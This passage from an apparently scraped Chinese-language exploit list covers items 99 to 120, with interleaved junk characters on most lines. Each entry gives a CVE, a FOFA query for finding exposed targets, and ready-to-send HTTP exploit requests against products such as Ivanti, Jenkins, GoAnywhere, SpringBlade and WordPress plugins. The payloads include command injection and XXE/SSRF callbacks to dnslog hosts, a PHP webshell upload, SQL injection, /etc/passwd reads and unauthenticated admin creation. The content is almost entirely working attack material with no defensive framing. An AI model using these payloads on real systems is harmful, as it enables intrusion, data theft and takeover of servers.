id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
, v% L: r+ i) N. m) v6 g* k! g- X. \3 g. l H/ {% Z6 P% n6 F ]
5 X: @+ ]7 F8 O; q o1 B( K99. Ncast盈可视高清智能录播系统busiFacade RCE: |7 x; h7 T6 ?6 x- W
CVE-2024-0305; `( y+ a3 ?% Y. d4 N. L
FOFA:app="Ncast-产品" && title=="高清智能录播系统"7 U3 Q) t( a) a+ W7 {4 t j
POST /classes/common/busiFacade.php HTTP/1.19 a6 E" x3 n6 h4 [, `
Host: 192.168.40.130:8080
. g$ d; g' _: i8 n! v: dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: [& o4 P5 |% E1 ^. V4 ?Connection: close
$ k" z6 u7 ~' O% j) e( KContent-Length: 154: F( ~4 @% X& M- y8 w- D4 o& | R
Accept: */*
, a S* j5 e0 @# qAccept-Encoding: gzip, deflate4 L! X h% R+ m$ F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ~1 \; N6 c5 V+ j; B! z R
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 B# @$ m6 a8 p. A) U; C$ g
X-Requested-With: XMLHttpRequest
+ B" W0 d% E1 ?$ [: O, t5 a2 d1 L# `
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
" V& Z! y, H% V& f5 k* |+ | ]
) A" _ L+ n! n/ T4 V1 K( z3 ]' k0 p8 Y* F# K
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传1 Y8 \* L7 J A# j5 t
CVE-2024-0352! A" f( _1 G5 w% R
FOFA:icon_hash="874152924"
6 W- P9 V- _# Y8 q: FPOST /api/file/formimage HTTP/1.1 G: ]/ K: E5 j# r5 r3 M
Host: 192.168.40.1300 |+ J4 i& b& p2 r) e7 X( u
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ K* R2 Q5 }( \" h, h2 SConnection: close
7 y! U& @+ B2 w+ T$ a5 ]% b) TContent-Length: 201
, J x+ A6 A8 `6 i F* J8 D, T" }; @Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei I; Z2 I6 E% s' P3 B0 P* k
Accept-Encoding: gzip$ ]" N* c& ^+ q; g2 f
4 u& m$ g3 j$ s
------WebKitFormBoundarygcflwtei
1 a! Q' ^& ?% z, HContent-Disposition: form-data; name="file";filename="IE4MGP.php"
+ v$ B* i% z& P5 y6 i/ v0 dContent-Type: application/x-php' _/ C9 J- X$ o& i6 ^
1 y$ Y: ^" P: t0 z# o1 V+ r8 p" e
2ayyhRXiAsKXL8olvF5s4qqyI2O7 |, y& e2 y2 C8 e# W. o
------WebKitFormBoundarygcflwtei--0 T h w& K$ K& P
- a( J& u/ ~1 ?0 D8 A' K7 B: w
* [7 T4 j2 r+ @/ D' T
101. ivanti policy secure-22.6命令注入6 O; Z) b' f% I
CVE-2024-21887
4 Y/ ~8 W! n& \6 G: rFOFA:body="welcome.cgi?p=logo"
0 X: C4 _5 G8 w/ [GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
( l+ ~. V$ w5 T2 ]" I8 _Host: x.x.x.xx.x.x.x
% _2 h# Z7 V4 w# t& e8 @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( B) H% b6 m2 R- Z
Connection: close/ D$ s$ r5 o: r9 B' ?: @( Z
Accept-Encoding: gzip5 _2 B! v J5 b6 [+ l( P1 p2 z
" N& P5 g& N t0 Q$ S- f% _
) a* _8 o- l3 s* v8 w& f102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* b! l; w" T6 v& z6 f1 O3 }
CVE-2024-21893
) g: g8 h1 W4 _* F3 m* _FOFA:body="welcome.cgi?p=logo"; c0 Y8 g! Y# O1 g
POST /dana-ws/saml20.ws HTTP/1.1
4 A' ?. L1 f$ {Host: x.x.x.x
' I) w; r) }5 l- U# c/ M" `/ C& `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& `: S* Z$ L5 I9 j0 Y& d* HConnection: close2 ]( g$ v7 q. m8 u( i
Content-Length: 792. R& Q. _9 [& K5 U. l+ T
Accept-Encoding: gzip
0 ~- j9 _. Y# R( ~( P8 |) H. e. l
' E$ c8 `7 O( m( b u5 n+ z4 N<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>. P. o% p1 _* N
- B* T' ]( A! O" Q* N8 l103. Ivanti Pulse Connect Secure VPN XXE1 o. z" G/ \3 ]' u1 ]8 ?( }7 F# G9 o. C
CVE-2024-22024
( Y6 [! }- x) t* @" S$ ^0 CFOFA:body="welcome.cgi?p=logo"
/ {& U! P' F7 BPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
* F! T( e% M7 t, J8 ^Host: 192.168.40.130:111
/ e# m: l( V1 {& I( }User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
t3 G H) d& qConnection: close* Z8 y8 R( W* A2 E- a9 P/ O. [
Content-Length: 204* c: s& c' }+ _( Q+ H
Content-Type: application/x-www-form-urlencoded& e; d+ ?, ^8 z/ F* o- [
Accept-Encoding: gzip5 f- q1 X, ^8 q! U
1 ? j, Q8 B' H9 M
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% w* \: ~ B+ [- V3 h. `. K& m* e6 A" h
: M' U6 f' L w b
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
7 {2 |- v: I h( Y( a j<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>0 j3 X* T8 z/ C) m$ Q
) R, g& Z4 H% s) K+ V5 L( W# U1 k) t0 r8 x
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露0 b5 N% j z" _$ m# u
CVE-2024-0569! U9 v: g1 B& r, M& o
FOFA:title="TOTOLINK"# j* q r3 a7 i6 t
POST /cgi-bin/cstecgi.cgi HTTP/1.1
U7 S$ u0 G( G# x8 j3 {- }Host:192.168.0.1
8 S- F, H4 l; X& T, Q9 O) CContent-Length:41
9 }0 y! i) C* ^: W3 `Accept:application/json,text/javascript,*/*;q=0.01: s( d& S2 N' q Q q/ O
X-Requested-with: XMLHttpRequest
0 T7 z9 m! P- U. q, J6 g- WUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.368 t, |$ H' Y/ A" e
Content-Type: application/x-www-form-urlencoded:charset=UTF-8) r' @3 H1 K8 e
Origin: http://192.168.0.1
2 L/ x/ @1 E* |) m) T/ qReferer: http://192.168.0.1/advance/index.html?time=1671152380564: z( X/ l# Q4 N$ i/ W* `" R
Accept-Encoding:gzip,deflate
6 v0 @' ?, m& o4 H6 W. E: HAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7+ t" T# a* g* ~ F" Z
Connection:close& |# ?6 x! T6 ^1 Y9 P
9 w/ g2 j( v" r: k{
/ Y, Q6 X9 ] r) G1 U( A7 V"topicurl":"getSysStatusCfg",6 ~6 i" s6 Y! {, X2 Q
"token":""4 o2 n4 t: K' W7 @2 a
}) _' ~- ^% J% ~" N. m
0 |% q& |7 L4 |105. SpringBlade v3.2.0 export-user SQL 注入
" E5 q: C/ c- Y9 v; t9 D& qFOFA:body="https://bladex.vip"0 ?) P4 B6 f; U: |5 z
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1" S! Z/ P; ]' ]+ z; i& }0 \5 c& w
- R r4 h* s) T# p8 \106. SpringBlade dict-biz/list SQL 注入
/ R7 l2 X# r# g' P% ~) \FOFA:body="Saber 将不能正常工作"& I2 z" r& E% e
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1' M3 ?5 e/ R$ j+ h
Host: your-ip3 K; {% ?& V; z5 J7 {4 t) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" @2 x2 n& R, B) Z ?Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A1 o1 d5 q2 s `, m
Accept-Encoding: gzip, deflate7 j( q; \: P0 g; R) j- W
Accept-Language: zh-CN,zh;q=0.9
; ^' Z* w* r7 t1 R2 VConnection: close
3 K: u! \* L. x7 m3 r5 U: m+ ^9 t: k) K
$ P! E4 v# k" @- M8 |; B- m. l107. SpringBlade tenant/list SQL 注入7 b; u2 ^$ [. X" e
FOFA:body="https://bladex.vip"
, i$ b! M9 Z7 |; C! Z# x7 H4 IGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
; v9 l, O+ h: S/ LHost: your-ip
* y- L7 n4 @, [: ]! BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* U( f* U7 J# @8 E8 v* kBlade-Auth:替换为自己的
, J: Y: w$ E# ^ y! t$ yConnection: close
+ ~4 p" `6 X: [8 q2 ?1 N; d: K" C1 W0 R" a3 O5 ^: o
3 n+ q1 x' |4 U1 `108. D-Tale 3.9.0 SSRF& U. g! |( b9 z( W5 I e
CVE-2024-21642, a$ i" }( Z k* O( F
FOFA:"dtale/static/images/favicon.png"
% z) w5 Y4 ]" i6 Y& ^$ pGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
( q3 z: P: e( ~0 T3 k! oHost: your-ip) H+ h7 S. I, J6 ?7 i4 W( B! {# I9 {
Accept: application/json, text/plain, */*
# X2 s8 t! ~6 i6 M7 X6 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 O' ?8 S+ Q+ @: Z1 LAccept-Encoding: gzip, deflate
% u/ U+ N: \5 X0 m, |! @- F( X B0 rAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 F" N* k1 |6 x% H Z" _
Connection: close6 B; X3 P* ?8 f: y% ^
# v3 `+ W. n* I h/ h* k& M* G8 W) v, C0 h( w5 R9 c
109. Jenkins CLI 任意文件读取
( A0 [1 q% G3 q3 GCVE-2024-238977 b$ s6 S" K! i& j5 p
FOFA:header="X-Jenkins"
2 j/ h9 {* k+ ^- q: l1 a/ [POST /cli?remoting=false HTTP/1.1* e3 r3 o0 H: _, [ \: D! y
Host:
' @# Z3 V* _5 { z% pContent-type: application/octet-stream
* D5 M1 E1 r& R, n) t7 Z6 m/ v5 \Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) A1 s U3 M* @7 D
Side: upload' X9 B- Z$ Y( l% H8 u$ E
Connection: keep-alive4 G. O4 S- i! i
Content-Length: 163
. V7 C9 B. D* J* O% _
+ p# d9 f; c0 k- M/ ?8 @- z) i( l1 ub'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 ~" z# K) v1 p7 s% G
1 f, E% ~/ r& a! b( [3 J4 T6 S( H( [) _# W+ A
POST /cli?remoting=false HTTP/1.1" Z1 X. b: W* P; E; M
Host:
, y' n$ b: R( \ i* H4 U$ T) H( uSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
- P! h/ z: W4 c2 b+ i% P0 M2 Ydownload
, O, _1 G/ J* JContent-Type: application/x-www-form-urlencoded
) W3 P4 G! p/ A- E4 cContent-Length: 0
) U& U2 V0 \* i5 P5 ]9 C! r, F4 v& r
2 S& @4 |7 R/ B& [ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
: W: { w" O! Cjava -jar jenkins-cli.jar help) x% V9 w1 T+ ^9 {
[COMMAND]
2 v0 ~7 Q: r5 d9 O7 G8 K4 q! \Lists all the available commands or a detailed description of single command.7 ~& s8 k* q1 Y9 G6 N5 ~; Q+ c& P
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
! g$ k/ e9 T% h
: Z) |# s+ d [5 Q0 a6 o
4 V7 t% g7 g1 y6 ?; b* }1 U# l110. Goanywhere MFT 未授权创建管理员. |+ m0 d6 F/ C9 D# c
CVE-2024-0204
4 e* }4 t& X( F5 V4 E( T' R$ c/ jFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
$ `. N* Y* S2 R5 U! AGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.13 f0 s8 b) r* }0 v2 E" y- ~& F
Host: 192.168.40.130:8000
9 I: Y/ x! k* C. x6 }4 qUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.366 ]. s( r: b9 S# Q2 ]- L, H
Connection: close
4 a$ e1 m. {9 ^& Q mAccept: */*3 P1 E& S: s V# U, T- g. i8 L* e# P
Accept-Language: en& h" p$ d/ m t8 G# |. h
Accept-Encoding: gzip
" |4 j) Y1 W0 z+ j& v5 _* ?* @2 a* v( d- S
E5 W, u+ J: L+ K* `/ l111. WordPress Plugin HTML5 Video Player SQL注入
; t% o3 U% P! s$ W2 SCVE-2024-1061
% x+ G- i: h5 q4 e. J' |) B' p$ wFOFA:"wordpress" && body="html5-video-player", b4 j6 h1 K8 W
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
( ]1 M# Q0 b8 A. CHost: 192.168.40.130:112
1 c; K6 M6 W, I8 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 Y# r9 v& H, ]: C6 x* aConnection: close0 }+ G6 o0 ?+ I/ {
Accept: */*
" p# s6 E- k F# _' H5 d& ?( ~Accept-Language: en
6 m8 {) P D( e1 U* Z% M- aAccept-Encoding: gzip
! j: B2 k8 U9 ?/ d
: | e+ N1 o! O8 @! k
: R% @" v3 P8 ~. t112. WordPress Plugin NotificationX SQL 注入
5 o8 N% q [- C6 @# n) kCVE-2024-1698' p) E3 O! m0 ^9 I
FOFA:body="/wp-content/plugins/notificationx"
# A' \3 S: y' K w# R6 y8 hPOST /wp-json/notificationx/v1/analytics HTTP/1.1
5 i9 T8 }$ Y7 g3 P DHost: {{Hostname}}
+ h% e7 S1 `+ \: S7 pContent-Type: application/json
& Z2 L0 ~6 q! }2 H
. B, X6 k) a% m{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}5 t% ^6 J6 E9 `6 Z
) p2 p2 r- K! D. B; ?0 `
, L- H% w$ K) _$ ^, A
113. WordPress Automatic 插件任意文件下载和SSRF
; L1 ]3 V- D+ U: W7 ~! z3 }CVE-2024-27954/ u8 b% Q( Q# O4 H/ n( \
FOFA:"/wp-content/plugins/wp-automatic"! K+ r( ~( W9 p
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
G9 Z8 o# D, S, N) THost: x.x.x.x
- u1 z) N! ~2 J0 S3 ]User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
4 E% T( o+ j- | l2 ?3 a' |Connection: close
3 w6 v& S5 ]; o9 @Accept: */*
8 P. T1 {4 Z3 ^* \, E( q! WAccept-Language: en
# S; |* G" w1 J- G _1 dAccept-Encoding: gzip
. {- x& Z0 p7 I5 _! m7 B: y7 ~1 D* v
. ]( Y M& k% G2 e- W& f
114. WordPress MasterStudy LMS插件 SQL注入
4 |1 J6 d; X2 h- C: LFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/". v4 x0 X8 w5 `9 z9 s+ l
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
) V3 j) ~2 F3 kHost: your-ip" v/ _- k% S7 j7 x
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 X6 D, H M3 J. x8 c5 B$ A! sAccept-Charset: utf-8
" K% F. } ^0 ~3 i% r( GAccept-Encoding: gzip, deflate3 z( J3 R1 m/ H
Connection: close
8 i% {/ ]2 |4 z/ x+ x
. Z: a1 O& f+ B& h: d
5 U) e5 \5 ^0 R% [, Q$ d D7 l' B115. WordPress Bricks Builder <= 1.9.6 RCE3 d; e: z! _5 a' L% e
CVE-2024-25600. F9 I$ B, Q( {- t8 j; v
FOFA: body="/wp-content/themes/bricks/"
1 W% x+ g1 Z, q6 r) K第一步,获取网站的nonce值
; Q- l) R0 S; H4 s2 Z. k" t) VGET / HTTP/1.1
( C$ j8 ^+ t* {! W9 EHost: x.x.x.x) D, U+ W1 V) w+ z
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- L L8 [; d: I6 W" |' j, _7 c
Connection: close! v" ^% S) D/ W* n# A
Accept-Encoding: gzip2 H+ B* L* q% s8 O6 H
, G: W/ Q" K+ ]( S& F5 f
+ n# \6 h7 ?1 f) u# y0 P* \
第二步替换nonce值,执行命令! c" Z: T9 q1 H! n6 p
POST /wp-json/bricks/v1/render_element HTTP/1.1: r" {& u6 X& n- X! m
Host: x.x.x.x1 U. _9 s! w3 }; `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! i0 j1 j/ C M0 r" C2 r
Connection: close
! E% U9 w) E! n0 A/ V. iContent-Length: 3563 z9 U5 _9 c6 }5 O+ v/ W
Content-Type: application/json
% a6 i' E5 ~; L5 |" C9 @Accept-Encoding: gzip
4 M$ S* i+ _6 L. j( p7 M2 k% i, w l. @* [9 y$ S
{/ A" d+ m6 \' O' L
"postId": "1",- X1 V. d. m) f$ w [
"nonce": "第一步获得的值",# W& J t( `; \. _* Z: P4 X
"element": {/ f5 w8 G4 \- R! r( u C& ~
"name": "container",, M: C y2 P3 U+ L; r
"settings": { Z1 x% M0 v3 Q
"hasLoop": "true",& A& B& m; m7 q5 }( U; s6 D
"query": {
" Q) ~" t% l! _) J "useQueryEditor": true,/ m! ?9 X: c5 L1 K
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
4 f$ @& S1 O& w" t8 t1 R "objectType": "post"
7 |9 ]! F% W8 U+ z }
; t' N1 j- \5 T9 h' t }. O2 H6 A5 l9 Z5 O7 g& }
}
. G0 X# ?/ L3 e/ Q S( W}
& f, I" \% s- F2 i/ q) G2 p. t( |7 p$ p" {
* \/ K( G# u" \7 P2 B$ I116. wordpress js-support-ticket文件上传
5 g) O3 C( s4 u4 j! m1 n) DFOFA:body="wp-content/plugins/js-support-ticket"$ o J3 W/ x( ~4 T# r
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
; X4 I" W$ L# {+ dHost:
# a. T3 r& z& G( q( UContent-Type: multipart/form-data; boundary=--------767099171# s. Y8 b/ Z* Y& {7 Y
User-Agent: Mozilla/5.0. S5 {, { u U+ x
+ Y) C! a1 l9 k% h----------7670991715 v1 f" y2 U" V, c3 ~" y3 Y
Content-Disposition: form-data; name="action"8 J- n/ `2 v. V8 z
configuration_saveconfiguration" e* p$ q2 X& T' H% k* a- l f
----------767099171- z3 S8 z; g+ A* g7 ^$ T
Content-Disposition: form-data; name="form_request"
1 p- g3 ]" m4 n' I/ \, Y$ m% mjssupportticket
+ A) Z4 a3 x) w6 g/ F- X----------767099171
+ Z& r( X8 z: i( e: l* BContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
. _+ s8 m+ ^* A$ N, }' L/ i7 yContent-Type: image/png: f6 k ~( a9 l) r" X4 u6 P
----------767099171--- _6 X7 H$ F1 t4 p9 N6 t! q6 A; z
1 e( q/ Z( d& s4 v
! a+ F8 x8 C0 d9 z117. WordPress LayerSlider插件SQL注入
9 q5 ^, V2 {4 Z% g( oversion:7.9.11 – 7.10.0$ L G, a/ C: x! ~& G
FOFA:body="/wp-content/plugins/LayerSlider/"
; ?: ]* u* U; L7 ~( S/ i3 pGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
8 |0 @9 G/ \# L0 l# x# h$ _Host: your-ip& E$ {9 _1 V1 ]/ V" Y {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 U) I: W* C5 v' _' m6 {% RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 Q4 s( p0 I. j9 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 o4 L3 A+ x3 J7 r% ~; g/ B
Accept-Encoding: gzip, deflate, br3 W# G$ E* Z9 h' l* q" a
Connection: close
, O7 f- M/ k1 v8 d! V, x. wUpgrade-Insecure-Requests: 1
+ [) s8 a, S& z2 ~4 ~4 F0 L6 H
; K- V; B$ B; P! H8 O! d5 M+ s: A2 ~; d2 Y7 o8 H6 ^0 _2 n5 m
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传7 ]! P/ F) f# B
CVE-2024-09394 I; z, a; ?& N% I6 y/ j' w
FOFA:title="Smart管理平台"
1 x, Q+ c, B3 r0 q6 u; MPOST /Tool/uploadfile.php? HTTP/1.1& M$ c, S6 z5 t; w8 |
Host: 192.168.40.130:8443
, `9 u! A) P+ G7 u" B! VCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f85 ?1 u# ?- @! d& h* @! Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' Y8 z( V! p% w* S* F! B: P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 y+ M& w4 e J0 G7 m" qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 ^# s6 ?6 ~! Q4 {0 w$ w* t0 K
Accept-Encoding: gzip, deflate
; M+ }" A! {4 D# L1 F5 _Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887 e0 t7 c. z+ [2 i
Content-Length: 405* O7 R. w: ?+ Z' L! T/ O
Origin: https://192.168.40.130:8443' h: a; c D. D# W
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
" S8 p2 b6 a0 [6 ?- p+ SUpgrade-Insecure-Requests: 1
9 b* K& u& p& {1 o, N0 r* ~ \, gSec-Fetch-Dest: document
% n# A$ h0 B8 V. Z% l8 vSec-Fetch-Mode: navigate) f( D) E' ^" T* J9 Z, ^
Sec-Fetch-Site: same-origin
3 |% f' ]! X# y2 t2 RSec-Fetch-User: ?1
$ P5 u3 z3 {. d" C$ t3 e7 X( gTe: trailers9 K2 q# t6 l* a _
Connection: close
- t, v; v/ r8 n+ ~/ I+ m3 S p
0 P) v( ~/ A5 q/ }6 J, O-----------------------------13979701222747646634037182887
% ~0 p$ i5 j) F- [7 lContent-Disposition: form-data; name="file_upload"; filename="contents.php"
: t/ e2 F& |$ P% w, p5 Z. ^6 W bContent-Type: application/octet-stream
8 D- N) ?+ S0 a {8 q' C; m2 t, \* g5 r! j; p+ T
<?php
5 I$ N5 t4 l2 vsystem($_POST["passwd"]);; R) l7 s: P3 s! S" _/ x" M) R
?>
: X4 _( n) n9 u4 E-----------------------------13979701222747646634037182887
- ~( A, V( E4 l; F7 B7 K8 {4 _Content-Disposition: form-data; name="txt_path"7 T& }5 V( X0 Y
. s/ w) }. r! `4 O4 _% {
/home/src.php6 ?( c( j r/ r% s; q5 J; z7 W
-----------------------------13979701222747646634037182887--
# k+ O2 O( w- _5 V
* Z3 _, r$ [) F1 w0 S- t1 e& `. R
k1 s7 i/ H/ W9 y访问/home/src.php9 S! L1 I$ H& r4 A4 V0 G
, _" e$ Y9 i6 r5 D6 T4 d
119. 北京百绰智能S20后台sysmanageajax.php sql注入
8 e& l, B9 h: d4 q& Z4 ~2 U# FCVE-2024-1254* q: u; H8 O5 H: r
FOFA:title="Smart管理平台") H6 N5 J# }) D4 N
先登录进入系统,默认账号密码为admin/admin+ \+ K z* u: F" F1 H$ Q
POST /sysmanage/sysmanageajax.php HTTP/1.11% ]6 m4 b* e5 ^3 [; v; G. |5 O
Host: x.x.x.x
+ P0 h( @0 v W0 o: k5 d& eCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee* G) v2 a% F7 v0 i" B* |) l* D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 G; l" b: e9 u- X7 oAccept: */*
$ M! y* ] \; ~' E, pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 q/ Q W7 Q0 }& G/ ]
Accept-Encoding: gzip, deflate# \" G$ Y. [" z0 \
Content-Type: application/x-www-form-urlencoded;9 ~0 p7 P1 h3 R, F, ^
Content-Length: 109
0 z' F. k# H |/ t: k6 POrigin: https://58.18.133.60:8443
0 ^& ` j- G4 k- G; r4 d7 W8 y) ?- |Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
( Q* @$ k8 i* J MSec-Fetch-Dest: empty5 {7 j d: _- i" F4 i, m% ]
Sec-Fetch-Mode: cors* z8 s3 Z" {9 k8 R$ Z
Sec-Fetch-Site: same-origin
9 q# H- a. B2 F8 D0 fX-Forwarded-For: 1.1.1.16 N' W4 I: \. z; T( n3 I
X-Originating-Ip: 1.1.1.1
+ t$ O; H+ w# O0 y% O0 KX-Remote-Ip: 1.1.1.1
" h8 u! m: S: q, b2 S" dX-Remote-Addr: 1.1.1.1 y$ M. b: p7 p5 s
Te: trailers$ X r' s% N8 h2 H. w' U) @9 T* h9 A
Connection: close
+ r2 |/ H Z5 O1 v$ Z& A) i/ ?4 v7 u! u" Z% ~ Y! N
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
) v) a6 p+ T, y4 H) A3 l. T! V+ n! D# ^" J: j0 c7 B
& P+ Q& }+ }- x120. 北京百绰智能S40管理平台导入web.php任意文件上传
